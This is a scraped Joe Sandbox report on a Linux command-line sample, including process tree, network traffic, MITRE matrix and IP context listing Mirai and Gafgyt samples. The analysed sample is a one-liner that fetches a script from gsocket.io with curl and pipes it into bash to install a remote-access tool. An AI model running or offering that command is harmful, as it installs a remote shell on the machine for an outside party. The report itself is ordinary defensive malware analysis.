Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:1523252
Infos:

Detection

Score:1
Range:0 - 100
Whitelisted:false

Signatures

Executes the "rm" command used to delete files or directories
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1523252
Start date and time:2024-10-01 11:03:30 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxcmdlinecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:CLEAN
Classification:clean1.lin@0/0@0/0

Runtime Messages

Command:/bin/sh -c "bash -c "$(curl -fsSL https:/gsocket.io/y)""
PID:6214
Exit Code:2
Exit Code Info:
Killed:False
Standard Output:

Standard Error:-fsSL: 1: Syntax error: end of file unexpected (expecting ")")

Process Tree

  • system is lnxubuntu20
  • dash New Fork (PID: 6195, Parent: 4333)
  • rm (PID: 6195, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XLLjV3kXao /tmp/tmp.K9K2DlMN56 /tmp/tmp.IZUV1kEnoY
  • dash New Fork (PID: 6196, Parent: 4333)
  • rm (PID: 6196, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XLLjV3kXao /tmp/tmp.K9K2DlMN56 /tmp/tmp.IZUV1kEnoY
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: classification engineClassification label: clean1.lin@0/0@0/0
Source: /usr/bin/dash (PID: 6195)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XLLjV3kXao /tmp/tmp.K9K2DlMN56 /tmp/tmp.IZUV1kEnoYJump to behavior
Source: /usr/bin/dash (PID: 6196)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XLLjV3kXao /tmp/tmp.K9K2DlMN56 /tmp/tmp.IZUV1kEnoYJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
109.202.202.202
unknownSwitzerland
13030INIT7CHfalse
91.189.91.43
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
91.189.91.42
unknownUnited Kingdom
41231CANONICAL-ASGBfalse

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43SecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
    x86_32.nn.elfGet hashmaliciousOkiruBrowse
      x86_64.nn.elfGet hashmaliciousOkiruBrowse
        arm.nn.elfGet hashmaliciousOkiruBrowse
          arm6.nn.elfGet hashmaliciousOkiruBrowse
            hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
              hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                cron.elfGet hashmaliciousUnknownBrowse
                  84.elfGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse
                      91.189.91.42SecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                          x86_64.nn.elfGet hashmaliciousOkiruBrowse
                            arm.nn.elfGet hashmaliciousOkiruBrowse
                              arm6.nn.elfGet hashmaliciousOkiruBrowse
                                hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    cron.elfGet hashmaliciousUnknownBrowse
                                      84.elfGet hashmaliciousUnknownBrowse
                                        SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CANONICAL-ASGBSecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          arm.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          arm6.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 91.189.91.42
                                          hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 91.189.91.42
                                          cayo.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 185.125.190.26
                                          cron.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          84.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          CANONICAL-ASGBSecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          arm.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          arm6.nn.elfGet hashmaliciousOkiruBrowse
                                          • 91.189.91.42
                                          hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 91.189.91.42
                                          hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 91.189.91.42
                                          cayo.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 185.125.190.26
                                          cron.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          84.elfGet hashmaliciousUnknownBrowse
                                          • 91.189.91.42
                                          INIT7CHSecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                          • 109.202.202.202
                                          x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                          • 109.202.202.202
                                          arm.nn.elfGet hashmaliciousOkiruBrowse
                                          • 109.202.202.202
                                          arm6.nn.elfGet hashmaliciousOkiruBrowse
                                          • 109.202.202.202
                                          hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 109.202.202.202
                                          hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 109.202.202.202
                                          cron.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          84.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse
                                          • 109.202.202.202

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          No created / dropped files found

                                          Static File Info

                                          No static file info

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 1, 2024 11:04:09.111720085 CEST43928443192.168.2.2391.189.91.42
                                          Oct 1, 2024 11:04:14.486897945 CEST42836443192.168.2.2391.189.91.43
                                          Oct 1, 2024 11:04:16.022885084 CEST4251680192.168.2.23109.202.202.202
                                          Oct 1, 2024 11:04:29.844863892 CEST43928443192.168.2.2391.189.91.42
                                          Oct 1, 2024 11:04:40.083437920 CEST42836443192.168.2.2391.189.91.43
                                          Oct 1, 2024 11:04:46.226691961 CEST4251680192.168.2.23109.202.202.202
                                          Oct 1, 2024 11:05:10.799170017 CEST43928443192.168.2.2391.189.91.42
                                          Oct 1, 2024 11:05:31.276448965 CEST42836443192.168.2.2391.189.91.43

                                          System Behavior

                                          General

                                          Start time (UTC):09:03:57
                                          Start date (UTC):01/10/2024
                                          Path:/usr/bin/dash
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Chronological Activities


                                          General

                                          Start time (UTC):09:03:57
                                          Start date (UTC):01/10/2024
                                          Path:/usr/bin/rm
                                          Arguments:rm -f /tmp/tmp.XLLjV3kXao /tmp/tmp.K9K2DlMN56 /tmp/tmp.IZUV1kEnoY
                                          File size:72056 bytes
                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                          Chronological Activities


                                          General

                                          Start time (UTC):09:03:57
                                          Start date (UTC):01/10/2024
                                          Path:/usr/bin/dash
                                          Arguments:-
                                          File size:129816 bytes
                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                          Chronological Activities


                                          General

                                          Start time (UTC):09:03:57
                                          Start date (UTC):01/10/2024
                                          Path:/usr/bin/rm
                                          Arguments:rm -f /tmp/tmp.XLLjV3kXao /tmp/tmp.K9K2DlMN56 /tmp/tmp.IZUV1kEnoY
                                          File size:72056 bytes
                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                          Chronological Activities